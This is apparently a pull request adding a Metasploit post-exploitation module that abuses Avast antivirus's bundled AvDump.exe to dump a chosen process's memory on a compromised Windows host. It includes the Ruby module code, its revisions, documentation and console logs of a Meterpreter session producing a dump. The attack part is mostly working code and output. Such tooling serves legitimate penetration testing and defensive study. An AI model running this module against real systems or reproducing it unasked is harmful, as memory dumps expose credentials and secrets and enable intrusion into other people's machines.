### PR TITLE
Windows post-exploitation gather module - Memory dumping via Avast AvDump utility

### DIFF
--- a/documentation/modules/post/windows/gather/avast_memory_dump.md
+++ b/documentation/modules/post/windows/gather/avast_memory_dump.md
@@ -1,0 +1,82 @@
+### Vulnerable Application -  Avast Home Security Suite - Avdump.exe
+
+The Avast Home Security suite ships with a memory dumping utility that can be
+leveraged to dump process memory of user defined processes to user defined 
+locations.
+
+
+## Verification Steps
+
+Verify that the path ```C:\\Program Files\\Avast Software Avast\\AvDump.exe```
+exists.
+1. Start msfconsole
+2. Get meterpreter session
+3. Do: ```use post/windows/gather/avast_memory_dump```
+4. Do: ```set SESSION <session id>```
+5. Do: ```set DUMP_PATH <specify path dest>```
+6. Do: ```set PID <pid>```
+7. Do: ```run```
+
+## Options
+
+**PID** 
+Specify the PID of the process you would like to dump.
+
+**DUMP_PATH** 
+Specify the location to write the memory dump to.
+
+##  Scenarios  
+
+### Windows 10 (2004 OS Build 19041.572)
+```
+msf5 > search avast
+
+Matching Modules
+================
+
+   #  Name                                   Disclosure Date  Rank    Check  Description
+   -  ----                                   ---------------  ----    -----  -----------
+   0  post/windows/gather/avast_memory_dump                   normal  No     Avast AV Memory Dumping Utility
+
+
+msf5 > use 0
+
+msf5 post(windows/gather/avast_memory_dump) > sessions -C 'ps -N notepad.exe'
+[*] Running 'ps -N notepad.exe' on meterpreter session 4 (192.168.218.131)
+Filtering on 'notepad.exe'
+
+Process List
+============
+
+ PID   PPID  Name         Arch  Session  User                  Path
+ ---   ----  ----         ----  -------  ----                  ----
+ 8504  1812  notepad.exe  x64   1        DESKTOP-CD2VHVO\user  C:\Windows\System32\notepad.exe
+
+msf5 post(windows/gather/avast_memory_dump) > show options
+
+Module options (post/windows/gather/avast_memory_dump):
+
+   Name       Current Setting           Required  Description
+   ----       ---------------           --------  -----------
+   DUMP_PATH  C:\Users\Public\test.dmp  yes       specify location to write dump file to
+   PID        8504                      yes       specify pid to dump
+   SESSION    4                         yes       The session to run this module on.
+   
+msf5 post(windows/gather/avast_memory_dump) > set PID 8504
+PID => 8504
+
+msf5 post(windows/gather/avast_memory_dump) > set SESSION 4
+SESSION => 4
+
+msf5 post(windows/gather/avast_memory_dump) > run
+
+[*] [2020.10.21-22:49:24] AvDump.exe exists!
+[*] [2020.10.21-22:49:24] executing Avast mem dump utility against 8504 to C:\Users\Public\test.dmp
+[*] [2020.10.21-22:49:29] [2020-10-22 02:49:26.969] [info   ] [dump       ] [ 1400: 8032] Dumpmaster is arming.
+[2020-10-22 02:49:27.047] [info   ] [dump       ] [ 1400: 8032] Successfully dumped process 8504 into 'C:\Users\Public\test.dmp'
+[2020-10-22 02:49:27.047] [info   ] [log_module ] [ 1400: 8032] LogModule is going to be destroyed.
+[2020-10-22 02:49:27.047] [info   ] [log_module ] [ 1400: 8032] =====================================================================================================================
+[*] Post module execution completed
+
+```
+

--- a/documentation/modules/post/windows/gather/avast_memory_dump.md
+++ b/documentation/modules/post/windows/gather/avast_memory_dump.md
@@ -5,6 +5,9 @@ leveraged to dump process memory of user defined processes to user defined
 locations.
 
 
+A detailed write up can be found at https://archcloudlabs.com/projects/dumping-memory-with-av/
+
+
 ## Verification Steps
 
 Verify that the path ```C:\\Program Files\\Avast Software Avast\\AvDump.exe```

--- a/modules/post/windows/gather/avast_memory_dump.rb
+++ b/modules/post/windows/gather/avast_memory_dump.rb
@@ -17,13 +17,13 @@ class MetasploitModule < Msf::Post
     ))
 
     register_options ( [
-        OptString.new('PID', [true, 'specify pid to dump']),
+        OptString.new('PID', [true, 'specify pid to dump' ]),
         OptString.new('DUMP_PATH', [true, 'specify location to write dump file to', "C:\\Users\\Public\\tmp.dmp"])
     ])
   end
 
   def check_for_dump
-    if file_exist?("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe") 
+    if file_exist?("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe")
         print_status("AvDump.exe exists!")
         return true
     else
@@ -37,7 +37,8 @@ class MetasploitModule < Msf::Post
     if check_for_dump
         print_status("executing Avast mem dump utility against #{datastore['PID']} to #{datastore['DUMP_PATH']}")
         result = cmd_exec("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe --pid #{datastore['PID']} --exception_ptr 0 --thread_id 0 --dump_file #{datastore['DUMP_PATH']} --min_interval 0")
-        store_loot("host.avast.memdump", "binary/db", session, "avast_memdump")
+        mem_file = read_file("#{datastore['DUMP_PATH']}")
+        store_loot("host.avast.memdump", "binary/db", session, mem_file)
         print_status(result)
     end
   end

--- a/modules/post/windows/gather/avast_memory_dump.rb
+++ b/modules/post/windows/gather/avast_memory_dump.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post
         'License'       => MSF_LICENSE,
         'Author'        => [ 'DLL_Cool_J' ],
         'Platform'      => [ 'win'],
-        'SessionTypes'  => [ 'meterpreter', 'shell' ]
+        'SessionTypes'  => [ 'meterpreter']
     ))
 
     register_options ( [

--- a/modules/post/windows/gather/avast_memory_dump.rb
+++ b/modules/post/windows/gather/avast_memory_dump.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Post
     ))
 
     register_options ( [
-        OptString.new('PID', [true, 'specify pid to dump', ""]),
+        OptString.new('PID', [true, 'specify pid to dump']),
         OptString.new('DUMP_PATH', [true, 'specify location to write dump file to', "C:\\Users\\Public\\tmp.dmp"])
     ])
   end
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Post
     if check_for_dump
         print_status("executing Avast mem dump utility against #{datastore['PID']} to #{datastore['DUMP_PATH']}")
         result = cmd_exec("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe --pid #{datastore['PID']} --exception_ptr 0 --thread_id 0 --dump_file #{datastore['DUMP_PATH']} --min_interval 0")
+        store_loot("host.avast.memdump", "binary/db", session, "avast_memdump")
         print_status(result)
     end
   end

--- a/modules/post/windows/gather/avast_memory_dump.rb
+++ b/modules/post/windows/gather/avast_memory_dump.rb
@@ -1,3 +1,8 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
 require 'rbconfig'
 
 class MetasploitModule < Msf::Post

--- a/modules/post/windows/gather/avast_memory_dump.rb
+++ b/modules/post/windows/gather/avast_memory_dump.rb
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Post
     print_status("Executing Avast mem dump utility against #{pid} to #{dump_path}")
     result = cmd_exec("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe --pid #{pid} --exception_ptr 0 --thread_id 0 --dump_file \"#{dump_path}\" --min_interval 0")
 
+    fail_with(Failure::Unknown, "Dump file #{dump_path} was not created") unless file_exist?(dump_path)
     print_status(dump_path)
     mem_file = read_file(dump_path)
     store_loot("host.avast.memdump", "binary/db", session, mem_file)

--- a/modules/post/windows/gather/avast_memory_dump.rb
+++ b/modules/post/windows/gather/avast_memory_dump.rb
@@ -1,0 +1,43 @@
+require 'rbconfig'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'          => 'Avast AV Memory Dumping Utility',
+        'Description'   => %q{
+            This module leverages an Avast Anti-Virus memory dump utility that is shipped
+            by default with Avast Anti-Virus Home software suite.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'DLL_Cool_J' ],
+        'Platform'      => [ 'win'],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ]
+    ))
+
+    register_options ( [
+        OptString.new('PID', [true, 'specify pid to dump', ""]),
+        OptString.new('DUMP_PATH', [true, 'specify location to write dump file to', "C:\\Users\\Public\\tmp.dmp"])
+    ])
+  end
+
+  def check_for_dump
+    if file_exist?("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe") 
+        print_status("AvDump.exe exists!")
+        return true
+    else
+        print_error("AvDump.exe does not exist on target.")
+        return false
+    end
+
+  end
+
+  def run
+    if check_for_dump
+        print_status("executing Avast mem dump utility against #{datastore['PID']} to #{datastore['DUMP_PATH']}")
+        result = cmd_exec("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe --pid #{datastore['PID']} --exception_ptr 0 --thread_id 0 --dump_file #{datastore['DUMP_PATH']} --min_interval 0")
+        print_status(result)
+    end
+  end
+end

--- a/modules/post/windows/gather/avast_memory_dump.rb
+++ b/modules/post/windows/gather/avast_memory_dump.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Post
     fail_with(Failure::NotVulnerable, 'AvDump.exe does not exist on target.') unless avdump_exists?
     print_status('AvDump.exe exists!')
 
-    dump_path = datastore['DUMP_PATH'] 
+    dump_path = datastore['DUMP_PATH']
     pid = datastore['PID'].to_s
 
     print_status("Executing Avast mem dump utility against #{pid} to #{dump_path}")


### PR DESCRIPTION
## What is it?

This PR contains a post-exploitation gather module to dump memory of a given process via [Avast Anti-Virus](https://www.avast.com/en-us/index#pc)' built-in AvDump utility.


## Verification

List the steps needed to make sure this thing works

```
[*] [2020.10.21-22:48:41] Sending stage (180291 bytes) to 192.168.218.131
[*] Meterpreter session 4 opened (192.168.218.11:4444 -> 192.168.218.131:49716) at 2020-10-21 22:48:41 -0400

msf5 > search avast

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  post/windows/gather/avast_memory_dump                   normal  No     Avast AV Memory Dumping Utility


msf5 > use 0

msf5 post(windows/gather/avast_memory_dump) > sessions -C 'ps -N notepad.exe'
[*] Running 'ps -N notepad.exe' on meterpreter session 4 (192.168.218.131)
Filtering on 'notepad.exe'

Process List
============

 PID   PPID  Name         Arch  Session  User                  Path
 ---   ----  ----         ----  -------  ----                  ----
 8504  1812  notepad.exe  x64   1        DESKTOP-CD2VHVO\user  C:\Windows\System32\notepad.exe

msf5 post(windows/gather/avast_memory_dump) > show options

Module options (post/windows/gather/avast_memory_dump):

   Name       Current Setting           Required  Description
   ----       ---------------           --------  -----------
   DUMP_PATH  C:\Users\Public\test.dmp  yes       specify location to write dump file to
   PID        8504                      yes       specify pid to dump
   SESSION    4                         yes       The session to run this module on.
   
msf5 post(windows/gather/avast_memory_dump) > set PID 8504
PID => 8504

msf5 post(windows/gather/avast_memory_dump) > set SESSION 4
SESSION => 4

msf5 post(windows/gather/avast_memory_dump) > run

[*] [2020.10.21-22:49:24] AvDump.exe exists!
[*] [2020.10.21-22:49:24] executing Avast mem dump utility against 8504 to C:\Users\Public\test.dmp
[*] [2020.10.21-22:49:29] [2020-10-22 02:49:26.969] [info   ] [dump       ] [ 1400: 8032] Dumpmaster is arming.
[2020-10-22 02:49:27.047] [info   ] [dump       ] [ 1400: 8032] Successfully dumped process 8504 into 'C:\Users\Public\test.dmp'
[2020-10-22 02:49:27.047] [info   ] [log_module ] [ 1400: 8032] LogModule is going to be destroyed.
[2020-10-22 02:49:27.047] [info   ] [log_module ] [ 1400: 8032] =====================================================================================================================
[*] Post module execution completed
```
